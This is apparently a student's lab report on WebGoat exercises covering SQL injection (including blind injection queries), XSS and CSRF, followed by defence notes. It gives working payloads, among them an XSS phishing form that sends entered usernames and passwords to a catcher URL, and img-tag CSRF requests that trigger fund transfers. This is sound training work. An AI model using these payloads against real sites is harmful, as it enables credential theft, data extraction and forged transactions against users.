20164317《网络对抗技术》Exp9 Web安全基础

Exp9 Web安全基础

一、实践目标

  1. 理解常用网络攻击技术的基本原理。
  2. 在Webgoat,实践相关实验。

SQL注入攻击

XSS攻击

CSRF攻击

二、实践过程

  1.环境配置:

  下好jar包然后放在根目录下

  使用:java -jar *.jar就可以解压运行webgoat了!

  2.使用webgoat:

  打开Firefox,输入http://127.0.0.1:8080/WebGoat/login.mvc访问webgoat

  

SQL注入攻击:

  Numeric SQL Injection

  要求注入字符串然后可以访问所有的天气情况:

  这里修改一下网页源代码就好了,随便选个城市然后修改他的value值,添加or 1=1 即可;

String SQL Injection

  要求作为smitn然后查看所有的信用卡信息:

  输入or 1=1 --

  --是注释掉后面的代码。

LAB: SQL Injection

  第一步:

  字符串注入:要求不使用正确密码就可以登陆管理员的账户,和前面一样,但是我们要先修改网站源代码

  使其在password一项中可以输入足够长:

然后构造真式即可

  第三步:

  Numeric SQL Injection

  先使用第一步的办法登陆员工的账户,然后再员工账户里点击查看按钮时查看管理员用户的信息

  我们先看看这个老板账户的值是排在表的最后:

然后就可以通过修改id为101 or 1=1order by salary desc这个语句来倒序查询下一个用户信息;

  下图就是修改位置,本来一开始想直接修改成老板的id但是不成功;

成功图:

 Blind Numeric SQL Injection

  数字盲注:要求就是通过输入框输入语句去查找到pins表里pin的值是多少:

  因为这里在输入框里输入语句可以进行判断,会给出判断结果,所以使用

  101 AND ((SELECT pin FROM pins WHERE cc_number='1111222233334444') > 2500);

  然后慢慢缩小范围即可:

找到最后的结果为2364:

Blind String SQL Injection

  和数字盲注差不多,这里是找字符串,语句就有所变化:

  101 AND (SUBSTRING((SELECT name FROM pins WHERE cc_number='4321432143214321'), 1, 1) = 'h' );

  意思是查找这个name的第一个字符的值是不是h

  这里有大小写区分,然后改变第一个1所在位置的值就是改变查找的字符串的字符位置;

  第一个字符为J

第二个为i

XSS攻击:

  跨站脚本钓鱼攻击(Phishing with XSS

(1)题目要求是关于一个页面中存在XSS漏洞时,如何支持钓鱼攻击。要求我们利用xss和html注入达到这些目标。

(2)使用XSS和HTML插入制作一个钓鱼网站,将其输入在search框中,代码如下:

</form>

  <script>

function hack(){

XSSImage=new Image;

XSSImage.src="http://localhost:8080/WebGoat/catcher?PROPERTY=yes&user=" + document.phish.user.value + "&password=" + document.phish.pass.value + "";

alert("Had this been a real attack... Your credentials were just stolen. User Name = " + document.phish.user.value + " Password = " + document.phish.pass.value);

}

  </script>

<form name="phish">

<br><br>

<HR>

  <H2>This feature requires account login:</H2>

<br>

  <br>Enter Username:<br>

  <input type="text" name="user">

  <br>Enter Password:<br>

  <input type="password" name = "pass">

<br>

  <input type="submit" name="login" value="login" onclick="hack()">

</form>

<br>

<br>

<HR

(3)输入后下拉网页,会有用户名和密码的框出现,随意输入用户名和密码

LAB: Cross Site Scripting

存储型XSS

(1)执行存储型跨站脚本攻击,以“Tom”身份登录网站,修改个人信息。验证用户“Jerry”会受到攻击。每个帐号的密码是用户明名字的小写(如:Tom的密码是tom)

(2)以用户名“Tom”密码tom登录,选择Tom,点击“View Profile”按钮。现在可 以看到Tom的个人信息。点击“Edit Profile",在“Street”一栏中进行XSS攻击。加入如下代码,点击“UpdateProfile": <script>alert("haha");</script> 

(3)退出登录,以用户名Jerry,密码ferry登录,选择浏览Tom的信息,会弹出如下注入脚本,攻击成功

Stored XSS Revisited

验证Bruce的个人简介中包含有XSS攻击,使用David用户登录,查看Bruce的个人简介,出现弹窗,表明存在XSS攻击。

Reflected XSS

(1)使用雇员搜索页面漏洞构造一个包含反射型XSS攻击代码的URL。验证另一位雇员访问该URL会受影响。

(2)以用户名Tom,密码tom登录。点击“SearchStaff",在搜索框中,添加如下一段代 码即可完成: <script>alert("XSS");<script> 

Stored XSS Attacks(存储式 XSS 攻击)

(1)目标是创建非法的消息内容,可以导致其他用户访问时载入非预期的页面或内容。

(2)在title中任意输入字符。在内容中输入以下代码: <script>alert("XSS");</script> 

(3)点击“hellworld",这就比如刚创建的帖子,由自己或者其他人浏览,然后会弹出一个对话框,证明XSS攻击成功

Reflected XSS Attacks(反射型XSS

(1)1.当我们输入错误的用户信息后,服务器校验输入有误,会返回错误页面并将错误内容展示给我们看

(2)如果将带有攻击性的URL作为输入源,比如,就会弹出对话框 <script>alert("helloworld");</script>

Cross Site Request Forgery (CSRF)

要求:CSRF通过伪装来自受信任用户的请求来利用受信任的网站。目标:向一个新闻组发送一封邮件,邮件中包含一张图片,这个图像的URL指向一个恶意请求。

在这节课中,URL应该指向“攻击”servlet,

  其中包含了“屏幕”和“菜单”参数,以及一个额外的参数“transferFunds”,它具有任意的数值。

  这里其实就说明了编写规则,只要查看网页上给出的scr和menu的值即可:

标题随便,在内容里写<imgsrc="http://localhost:8080/WebGoat/attack?Screen=2078372&menu=900&transferFunds=20000"/>

  然后提交,打开消息就行了:

 

  CSRF Prompt By-Pass

  要求:输入代码,第一个为转帐的请求,第二个请求确认第一个请求触发的提示

  根据提示来编写,也是需要查看网页的几个值:

  然后编写成下面的代码即可:

  <img src="attack?Screen=1471017872&menu=900&transferFunds=6000"
  width="1" height="1">
  <img src="attack?Screen=1471017872&menu=900&transferFunds=confirm"
  width="1" height="1">

CSRF Token By-Pass

  也是要求编写代码,构造好了,然后发送,点击即可

三、实验后回答问题

1SQL注入攻击原理,如何防御

1.对漏洞注入点相关代码进行处理,筛除特殊字符,以规范代码安全性;

2.关闭或删除不必要的交互式提交表单页面;

3.普通用户与系统管理员用户的权限要有严格的区分;

4.不要在服务器端放置备份的文件以免受到感染,或备份的文件含有漏洞,造成切入点。

2XSS攻击的原理,如何防御

1.网站开发者运用转义安全字符等手段,并且坚持不相信用户输入的任何数据的原则

2.表单提交的时候进行特殊字符的检测

3.对输入框做长度限制

4.在后台对数据进行过滤

3CSRF攻击原理,如何防御

1.使用令牌,每一个网页包含一个web server产生的令牌,提交时,也将该令牌提交到服务器,服务器进行判断,如果令牌不符合,就判定存在CSRF攻击;

2.将提交方法改为post,或将 GET请求设置为只浏览而不改变服务器端资源

3.定期清理cookie

4.使用随机数对表单中的值进行验证

四、实验总结

通过本次实验,加深了我对XSS攻击、SQL注入以及CSRF攻击的理解。虽然一开始下载jar包就用了很长时间,但对于行不通的方法真的要好好找资料换其他可行的方法,实践不止局限于课程中的指导,不断地查资料会让自己了解的更全面。

最后一次实验到这里就结束了,不过对安全的探究应该才刚刚开始,在经历了一个学期的技术课程学习后,收获挺大的,网络安全不知道算不算入门。

感谢老师的教学与指导!

猜你喜欢

转载自www.cnblogs.com/liauer/p/10920089.html